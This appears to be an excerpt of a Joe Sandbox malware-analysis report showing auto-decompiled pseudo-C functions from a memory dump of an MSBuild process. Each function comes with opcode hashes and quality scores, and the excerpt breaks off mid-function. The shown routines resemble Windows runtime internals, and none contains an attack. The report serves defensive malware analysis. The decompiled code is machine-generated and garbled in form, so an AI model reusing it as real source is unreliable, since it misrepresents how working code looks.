                                            • Instruction Fuzzy Hash: BC11A03270064A9BD751AE28C98A96A77E5FF88650B00063CFAC587A51DB25EC10C7D5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 87%
                                            			E010437F5(void* __ecx, intOrPtr* __edx) {
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed char _t6;
                                            				intOrPtr _t13;
                                            				intOrPtr* _t20;
                                            				intOrPtr* _t27;
                                            				void* _t28;
                                            				intOrPtr* _t29;
                                            
                                            				_t27 = __edx;
                                            				_t28 = __ecx;
                                            				if(__edx == 0) {
                                            					E01022280(_t6, 0x10f8550);
                                            				}
                                            				_t29 = E0104387E(_t28);
                                            				if(_t29 == 0) {
                                            					L6:
                                            					if(_t27 == 0) {
                                            						E0101FFB0(0x10f8550, _t27, 0x10f8550);
                                            					}
                                            					if(_t29 == 0) {
                                            						return 0xc0000225;
                                            					} else {
                                            						if(_t27 != 0) {
                                            							goto L14;
                                            						}
                                            						L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                            						goto L11;
                                            					}
                                            				} else {
                                            					_t13 =  *_t29;
                                            					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                            						L13:
                                            						_push(3);
                                            						asm("int 0x29");
                                            						L14:
                                            						 *_t27 = _t29;
                                            						L11:
                                            						return 0;
                                            					}
                                            					_t20 =  *((intOrPtr*)(_t29 + 4));
                                            					if( *_t20 != _t29) {
                                            						goto L13;
                                            					}
                                            					 *_t20 = _t13;
                                            					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                            					asm("btr eax, ecx");
                                            					goto L6;
                                            				}
                                            			}












                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c23f6f1e776bace778100967c0ce228ff5af48f9dc6c6141b322ff37641b5ff9
                                            • Instruction ID: 8c5426f2e24affd4c4a2011799eeb4c582e738fc05b0b0ccd05dfa6dcfa5dd17
                                            • Opcode Fuzzy Hash: c23f6f1e776bace778100967c0ce228ff5af48f9dc6c6141b322ff37641b5ff9
                                            • Instruction Fuzzy Hash: 8801A1F29017319BE3278B1D9980A2AFBE6FF95A6071550BDE9C98F215D730C801C790
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0103002D() {
                                            				void* _t11;
                                            				char* _t14;
                                            				signed char* _t16;
                                            				char* _t27;
                                            				signed char* _t29;
                                            
                                            				_t11 = E01027D50();
                                            				_t27 = 0x7ffe0384;
                                            				if(_t11 != 0) {
                                            					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            				} else {
                                            					_t14 = 0x7ffe0384;
                                            				}
                                            				_t29 = 0x7ffe0385;
                                            				if( *_t14 != 0) {
                                            					if(E01027D50() == 0) {
                                            						_t16 = 0x7ffe0385;
                                            					} else {
                                            						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            					}
                                            					if(( *_t16 & 0x00000040) != 0) {
                                            						goto L18;
                                            					} else {
                                            						goto L3;
                                            					}
                                            				} else {
                                            					L3:
                                            					if(E01027D50() != 0) {
                                            						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            					}
                                            					if( *_t27 != 0) {
                                            						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                            							goto L5;
                                            						}
                                            						if(E01027D50() != 0) {
                                            							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            						}
                                            						if(( *_t29 & 0x00000020) == 0) {
                                            							goto L5;
                                            						}
                                            						L18:
                                            						return 1;
                                            					} else {
                                            						L5:
                                            						return 0;
                                            					}
                                            				}
                                            			}









                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                            • Instruction ID: 470cf566db68ca46d7881f795a2bb6a888ecabb87cadaa3d8f3978559c602327
                                            • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                            • Instruction Fuzzy Hash: 7A11A132A066818FE7639B2CC944B79BBE8EB91754F0900E0FE84C7692D729DC41C668
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E0101766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                            				char _v8;
                                            				void* _t22;
                                            				void* _t24;
                                            				intOrPtr _t29;
                                            				intOrPtr* _t30;
                                            				void* _t42;
                                            				intOrPtr _t47;
                                            
                                            				_push(__ecx);
                                            				_t36 =  &_v8;
                                            				if(E0103F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                            					L10:
                                            					_t22 = 0;
                                            				} else {
                                            					_t24 = _v8 + __ecx;
                                            					_t42 = _t24;
                                            					if(_t24 < __ecx) {
                                            						goto L10;
                                            					} else {
                                            						if(E0103F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                            							goto L10;
                                            						} else {
                                            							_t29 = _v8 + _t42;
                                            							if(_t29 < _t42) {
                                            								goto L10;
                                            							} else {
                                            								_t47 = _t29;
                                            								_t30 = _a16;
                                            								if(_t30 != 0) {
                                            									 *_t30 = _t47;
                                            								}
                                            								if(_t47 == 0) {
                                            									goto L10;
                                            								} else {
                                            									_t22 = L01024620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _t22;
                                            			}











                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                            • Instruction ID: d751ffc47b8f52e4a34c164cd7ac725fd0b8023350e1247a89bc688f2d18bf04
                                            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                            • Instruction Fuzzy Hash: BA01AC32700119ABD730DE9ECC45E9B7BADEF8C660F144964BA88CB258DA34DD01C7A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 69%
                                            			E01009080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                            				intOrPtr* _t51;
                                            				intOrPtr _t59;
                                            				signed int _t64;
                                            				signed int _t67;
                                            				signed int* _t71;
                                            				signed int _t74;
                                            				signed int _t77;
                                            				signed int _t82;
                                            				intOrPtr* _t84;
                                            				void* _t85;
                                            				intOrPtr* _t87;
                                            				void* _t94;
                                            				signed int _t95;
                                            				intOrPtr* _t97;
                                            				signed int _t99;
                                            				signed int _t102;
                                            				void* _t104;
                                            
                                            				_push(__ebx);
                                            				_push(__esi);
                                            				_push(__edi);
                                            				_t97 = __ecx;
                                            				_t102 =  *(__ecx + 0x14);
                                            				if((_t102 & 0x02ffffff) == 0x2000000) {
                                            					_t102 = _t102 | 0x000007d0;
                                            				}
                                            				_t48 =  *[fs:0x30];
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                            					_t102 = _t102 & 0xff000000;
                                            				}
                                            				_t80 = 0x10f85ec;
                                            				E01022280(_t48, 0x10f85ec);
                                            				_t51 =  *_t97 + 8;
                                            				if( *_t51 != 0) {
                                            					L6:
                                            					return E0101FFB0(_t80, _t97, _t80);
                                            				} else {
                                            					 *(_t97 + 0x14) = _t102;
                                            					_t84 =  *0x10f538c; // 0x771a6828
                                            					if( *_t84 != 0x10f5388) {
                                            						_t85 = 3;
                                            						asm("int 0x29");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						_push(0x2c);
                                            						_push(0x10df6e8);
                                            						E0105D0E8(0x10f85ec, _t97, _t102);
                                            						 *((char*)(_t104 - 0x1d)) = 0;
                                            						_t99 =  *(_t104 + 8);
                                            						__eflags = _t99;
                                            						if(_t99 == 0) {
                                            							L13:
                                            							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                            							if(__eflags == 0) {
                                            								E010D88F5(_t80, _t85, 0x10f5388, _t99, _t102, __eflags);
                                            							}
                                            						} else {
                                            							__eflags = _t99 -  *0x10f86c0; // 0xac07b0
                                            							if(__eflags == 0) {
                                            								goto L13;
                                            							} else {
                                            								__eflags = _t99 -  *0x10f86b8; // 0x0
                                            								if(__eflags == 0) {
                                            									goto L13;
                                            								} else {
                                            									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                            									__eflags =  *((char*)(_t59 + 0x28));
                                            									if( *((char*)(_t59 + 0x28)) == 0) {
                                            										E01022280(_t99 + 0xe0, _t99 + 0xe0);
                                            										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                            										__eflags =  *((char*)(_t99 + 0xe5));
                                            										if(__eflags != 0) {
                                            											E010D88F5(0x10f85ec, _t85, 0x10f5388, _t99, _t102, __eflags);
                                            										} else {
                                            											__eflags =  *((char*)(_t99 + 0xe4));
                                            											if( *((char*)(_t99 + 0xe4)) == 0) {
                                            												 *((char*)(_t99 + 0xe4)) = 1;
                                            												_push(_t99);
                                            												_push( *((intOrPtr*)(_t99 + 0x24)));
                                            												E0104AFD0();
                                            											}
                                            											while(1) {
                                            												_t71 = _t99 + 8;
                                            												 *(_t104 - 0x2c) = _t71;
                                            												_t80 =  *_t71;
                                            												_t95 = _t71[1];
                                            												 *(_t104 - 0x28) = _t80;
                                            												 *(_t104 - 0x24) = _t95;
                                            												while(1) {
                                            													L19:
                                            													__eflags = _t95;
                                            													if(_t95 == 0) {
                                            														break;
                                            													}
                                            													_t102 = _t80;
                                            													 *(_t104 - 0x30) = _t95;
                                            													 *(_t104 - 0x24) = _t95 - 1;
                                            													asm("lock cmpxchg8b [edi]");
                                            													_t80 = _t102;
                                            													 *(_t104 - 0x28) = _t80;
                                            													 *(_t104 - 0x24) = _t95;
                                            													__eflags = _t80 - _t102;
                                            													_t99 =  *(_t104 + 8);
                                            													if(_t80 != _t102) {
                                            														continue;
                                            													} else {
                                            														__eflags = _t95 -  *(_t104 - 0x30);
                                            														if(_t95 !=  *(_t104 - 0x30)) {
                                            															continue;
                                            														} else {
                                            															__eflags = _t95;
                                            															if(_t95 != 0) {
                                            																_t74 = 0;
                                            																 *(_t104 - 0x34) = 0;
                                            																_t102 = 0;
                                            																__eflags = 0;
                                            																while(1) {
                                            																	 *(_t104 - 0x3c) = _t102;
                                            																	__eflags = _t102 - 3;
                                            																	if(_t102 >= 3) {
                                            																		break;
                                            																	}
                                            																	__eflags = _t74;
                                            																	if(_t74 != 0) {
                                            																		L49:
                                            																		_t102 =  *_t74;
                                            																		__eflags = _t102;
                                            																		if(_t102 != 0) {
                                            																			_t102 =  *(_t102 + 4);
                                            																			__eflags = _t102;
                                            																			if(_t102 != 0) {
                                            																				 *0x10fb1e0(_t74, _t99);
                                            																				 *_t102();
                                            																			}
                                            																		}
                                            																		do {
                                            																			_t71 = _t99 + 8;
                                            																			 *(_t104 - 0x2c) = _t71;
                                            																			_t80 =  *_t71;
                                            																			_t95 = _t71[1];
                                            																			 *(_t104 - 0x28) = _t80;
                                            																			 *(_t104 - 0x24) = _t95;
                                            																			goto L19;
                                            																		} while (_t74 == 0);
                                            																		goto L49;
                                            																	} else {
                                            																		_t82 = 0;
                                            																		__eflags = 0;
                                            																		while(1) {
                                            																			 *(_t104 - 0x38) = _t82;
                                            																			__eflags = _t82 -  *0x10f84c0;
                                            																			if(_t82 >=  *0x10f84c0) {
                                            																				break;
                                            																			}
                                            																			__eflags = _t74;
                                            																			if(_t74 == 0) {
                                            																				_t77 = E010D9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                            																				__eflags = _t77;
                                            																				if(_t77 == 0) {
                                            																					_t74 = 0;
                                            																					__eflags = 0;
                                            																				} else {
                                            																					_t74 = _t77 + 0xfffffff4;
                                            																				}
                                            																				 *(_t104 - 0x34) = _t74;
                                            																				_t82 = _t82 + 1;
                                            																				continue;
                                            																			}
                                            																			break;
                                            																		}
                                            																		_t102 = _t102 + 1;
                                            																		continue;
                                            																	}
                                            																	goto L20;
                                            																}
                                            																__eflags = _t74;
                                            															}
                                            														}
                                            													}
                                            													break;
                                            												}
                                            												L20:
                                            												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                            												 *((char*)(_t99 + 0xe5)) = 1;
                                            												 *((char*)(_t104 - 0x1d)) = 1;
                                            												goto L21;
                                            											}
                                            										}
                                            										L21:
                                            										 *(_t104 - 4) = 0xfffffffe;
                                            										E0100922A(_t99);
                                            										_t64 = E01027D50();
                                            										__eflags = _t64;
                                            										if(_t64 != 0) {
                                            											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            										} else {
                                            											_t67 = 0x7ffe0386;
                                            										}
                                            										__eflags =  *_t67;
                                            										if( *_t67 != 0) {
                                            											_t67 = E010D8B58(_t99);
                                            										}
                                            										__eflags =  *((char*)(_t104 - 0x1d));
                                            										if( *((char*)(_t104 - 0x1d)) != 0) {
                                            											__eflags = _t99 -  *0x10f86c0; // 0xac07b0
                                            											if(__eflags != 0) {
                                            												__eflags = _t99 -  *0x10f86b8; // 0x0
                                            												if(__eflags == 0) {
                                            													_t94 = 0x10f86bc;
                                            													_t87 = 0x10f86b8;
                                            													goto L27;
                                            												} else {
                                            													__eflags = _t67 | 0xffffffff;
                                            													asm("lock xadd [edi], eax");
                                            													if(__eflags == 0) {
                                            														E01009240(_t80, _t99, _t99, _t102, __eflags);
                                            													}
                                            												}
                                            											} else {
                                            												_t94 = 0x10f86c4;
                                            												_t87 = 0x10f86c0;
                                            												L27:
                                            												E01039B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                            											}
                                            										}
                                            									} else {
                                            										goto L13;
                                            									}
                                            								}
                                            							}
                                            						}
                                            						return E0105D130(_t80, _t99, _t102);
                                            					} else {
                                            						 *_t51 = 0x10f5388;
                                            						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                            						 *_t84 = _t51;
                                            						 *0x10f538c = _t51;
                                            						goto L6;
                                            					}
                                            				}
                                            			}





















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e34d923b6fb5913db6d9aa9639d108d0ad103908ad6889cc3c64b3d861b92be
                                            • Instruction ID: f39896792662c817a875f9d5e60ca000d4a6ac46420128eb897564a2b2fa33cf
                                            • Opcode Fuzzy Hash: 4e34d923b6fb5913db6d9aa9639d108d0ad103908ad6889cc3c64b3d861b92be
                                            • Instruction Fuzzy Hash: D801F4726012018FE326CF0CDC40B117BE9EF41325F21806AF2898BAD2C375DC41CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 46%
                                            			E0109C450(intOrPtr* _a4) {
                                            				signed char _t25;
                                            				intOrPtr* _t26;
                                            				intOrPtr* _t27;
                                            
                                            				_t26 = _a4;
                                            				_t25 =  *(_t26 + 0x10);
                                            				if((_t25 & 0x00000003) != 1) {
                                            					_push(0);
                                            					_push(0);
                                            					_push(0);
                                            					_push( *((intOrPtr*)(_t26 + 8)));
                                            					_push(0);
                                            					_push( *_t26);
                                            					E01049910();
                                            					_t25 =  *(_t26 + 0x10);
                                            				}
                                            				if((_t25 & 0x00000001) != 0) {
                                            					_push(4);
                                            					_t7 = _t26 + 4; // 0x4
                                            					_t27 = _t7;
                                            					_push(_t27);
                                            					_push(5);
                                            					_push(0xfffffffe);
                                            					E010495B0();
                                            					if( *_t27 != 0) {
                                            						_push( *_t27);
                                            						E010495D0();
                                            					}
                                            				}
                                            				_t8 = _t26 + 0x14; // 0x14
                                            				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                            				}
                                            				_push( *_t26);
                                            				E010495D0();
                                            				return L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                            			}







                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                            • Instruction ID: 95387c7e2cad9286929e412b2a1d52fe0f65ddd72528a14bda7418b5a3a1c469
                                            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                            • Instruction Fuzzy Hash: 9A0180B2240506BFEB21AF69CD90EA3BB6DFB64794F104535F29442560CB31ACA0DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E010D4015(signed int __eax, signed int __ecx) {
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed char _t10;
                                            				signed int _t28;
                                            
                                            				_push(__ecx);
                                            				_t28 = __ecx;
                                            				asm("lock xadd [edi+0x24], eax");
                                            				_t10 = (__eax | 0xffffffff) - 1;
                                            				if(_t10 == 0) {
                                            					_t1 = _t28 + 0x1c; // 0x1e
                                            					E01022280(_t10, _t1);
                                            					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                            					E01022280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x10f86ac);
                                            					E0100F900(0x10f86d4, _t28);
                                            					E0101FFB0(0x10f86ac, _t28, 0x10f86ac);
                                            					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                            					E0101FFB0(0, _t28, _t1);
                                            					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                            					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                            						L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                            					}
                                            					_t10 = L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                            				}
                                            				return _t10;
                                            			}








                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a9a2c25d48d80726a3c9e9d314105c737c6592a27ab0096fb995bf98a9e7e24e
                                            • Instruction ID: 08c44c41115ac5ca9f95fa0b02d5cf64ea6f03df85b73ef1acbe96d5063db303
                                            • Opcode Fuzzy Hash: a9a2c25d48d80726a3c9e9d314105c737c6592a27ab0096fb995bf98a9e7e24e
                                            • Instruction Fuzzy Hash: 9901A7722016567FD351AB79CD80E93B7ACFF69650B000229F548C7E11CB34EC11C6E4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 61%
                                            			E010C138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				short _v54;
                                            				char _v60;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char* _t21;
                                            				intOrPtr _t27;
                                            				intOrPtr _t33;
                                            				intOrPtr _t34;
                                            				signed int _t35;
                                            
                                            				_t32 = __edx;
                                            				_t27 = __ebx;
                                            				_v8 =  *0x10fd360 ^ _t35;
                                            				_t33 = __edx;
                                            				_t34 = __ecx;
                                            				E0104FA60( &_v60, 0, 0x30);
                                            				_v20 = _a4;
                                            				_v16 = _a8;
                                            				_v28 = _t34;
                                            				_v24 = _t33;
                                            				_v54 = 0x1033;
                                            				if(E01027D50() == 0) {
                                            					_t21 = 0x7ffe0388;
                                            				} else {
                                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            				}
                                            				_push( &_v60);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t21 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                            			}


















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fe5e5e53bdb5e0b0231c7a77a2399fb4b60caf57bbf1998307ef58795e1e4d52
                                            • Instruction ID: 69177e6af7cac50c15a7b57ed65ac5c65bb6abc3a43c0d470434c800ec9b804d
                                            • Opcode Fuzzy Hash: fe5e5e53bdb5e0b0231c7a77a2399fb4b60caf57bbf1998307ef58795e1e4d52
                                            • Instruction Fuzzy Hash: A3015271A00219AFDB14DFA9D881FAEBBB8EF54710F40406AF944EB281D674DA11CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 61%
                                            			E010C14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				short _v54;
                                            				char _v60;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char* _t21;
                                            				intOrPtr _t27;
                                            				intOrPtr _t33;
                                            				intOrPtr _t34;
                                            				signed int _t35;
                                            
                                            				_t32 = __edx;
                                            				_t27 = __ebx;
                                            				_v8 =  *0x10fd360 ^ _t35;
                                            				_t33 = __edx;
                                            				_t34 = __ecx;
                                            				E0104FA60( &_v60, 0, 0x30);
                                            				_v20 = _a4;
                                            				_v16 = _a8;
                                            				_v28 = _t34;
                                            				_v24 = _t33;
                                            				_v54 = 0x1034;
                                            				if(E01027D50() == 0) {
                                            					_t21 = 0x7ffe0388;
                                            				} else {
                                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            				}
                                            				_push( &_v60);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t21 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d3ca091e61473b9bf20bc84b8b27aa999345d3985253183f531cbf49d515c63b
                                            • Instruction ID: 33d6151a740f8e230f63b7da7c1078d31f2ff5ce9d827566134614482bf4fc37
                                            • Opcode Fuzzy Hash: d3ca091e61473b9bf20bc84b8b27aa999345d3985253183f531cbf49d515c63b
                                            • Instruction Fuzzy Hash: 50019271A00259EFDB10DFA8D841EEEBBB8EF54700F44406AF944EB281D674DA00CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E010058EC(intOrPtr __ecx) {
                                            				signed int _v8;
                                            				char _v28;
                                            				char _v44;
                                            				char _v76;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr _t10;
                                            				intOrPtr _t16;
                                            				intOrPtr _t17;
                                            				intOrPtr _t27;
                                            				intOrPtr _t28;
                                            				signed int _t29;
                                            
                                            				_v8 =  *0x10fd360 ^ _t29;
                                            				_t10 =  *[fs:0x30];
                                            				_t27 = __ecx;
                                            				if(_t10 == 0) {
                                            					L6:
                                            					_t28 = 0xfe5c80;
                                            				} else {
                                            					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                            					if(_t16 == 0) {
                                            						goto L6;
                                            					} else {
                                            						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                            					}
                                            				}
                                            				if(E01005943() != 0 &&  *0x10f5320 > 5) {
                                            					E01087B5E( &_v44, _t27);
                                            					_t22 =  &_v28;
                                            					E01087B5E( &_v28, _t28);
                                            					_t11 = E01087B9C(0x10f5320, 0xfebf15,  &_v28, _t22, 4,  &_v76);
                                            				}
                                            				return E0104B640(_t11, _t17, _v8 ^ _t29, 0xfebf15, _t27, _t28);
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ea54db85a7fd3c3b400d12ac2e908bcd6a67322a11c761f10c5e40e45dbcacd
                                            • Instruction ID: cf6ea734f14873112b785ab70a7aee5db8a5eccb0bfe59cba6da219a249a4466
                                            • Opcode Fuzzy Hash: 3ea54db85a7fd3c3b400d12ac2e908bcd6a67322a11c761f10c5e40e45dbcacd
                                            • Instruction Fuzzy Hash: 1301F231A00505ABE714EA79CC01AAE7BA9EF81220F5440A9AA85AB684DE30DD02CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0101B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                            				signed char _t11;
                                            				signed char* _t12;
                                            				intOrPtr _t24;
                                            				signed short* _t25;
                                            
                                            				_t25 = __edx;
                                            				_t24 = __ecx;
                                            				_t11 = ( *[fs:0x30])[0x50];
                                            				if(_t11 != 0) {
                                            					if( *_t11 == 0) {
                                            						goto L1;
                                            					}
                                            					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                            					L2:
                                            					if( *_t12 != 0) {
                                            						_t12 =  *[fs:0x30];
                                            						if((_t12[0x240] & 0x00000004) == 0) {
                                            							goto L3;
                                            						}
                                            						if(E01027D50() == 0) {
                                            							_t12 = 0x7ffe0385;
                                            						} else {
                                            							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                            						}
                                            						if(( *_t12 & 0x00000020) == 0) {
                                            							goto L3;
                                            						}
                                            						return E01087016(_a4, _t24, 0, 0, _t25, 0);
                                            					}
                                            					L3:
                                            					return _t12;
                                            				}
                                            				L1:
                                            				_t12 = 0x7ffe0384;
                                            				goto L2;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                            • Instruction ID: 944dddd81bb00faa1c7f6bb171c15c88e8a68d76b2715b13922a28f9606402f9
                                            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                            • Instruction Fuzzy Hash: 41018F32704980DFE323971CC988F6A7BECEB85750F0900E1FA99CBA65D728DC40C620
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010D1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                            				char _v8;
                                            				void* _v11;
                                            				unsigned int _v12;
                                            				void* _v15;
                                            				void* __esi;
                                            				void* __ebp;
                                            				char* _t16;
                                            				signed int* _t35;
                                            
                                            				_t22 = __ebx;
                                            				_t35 = __ecx;
                                            				_v8 = __edx;
                                            				_t13 =  !( *__ecx) + 1;
                                            				_v12 =  !( *__ecx) + 1;
                                            				if(_a4 != 0) {
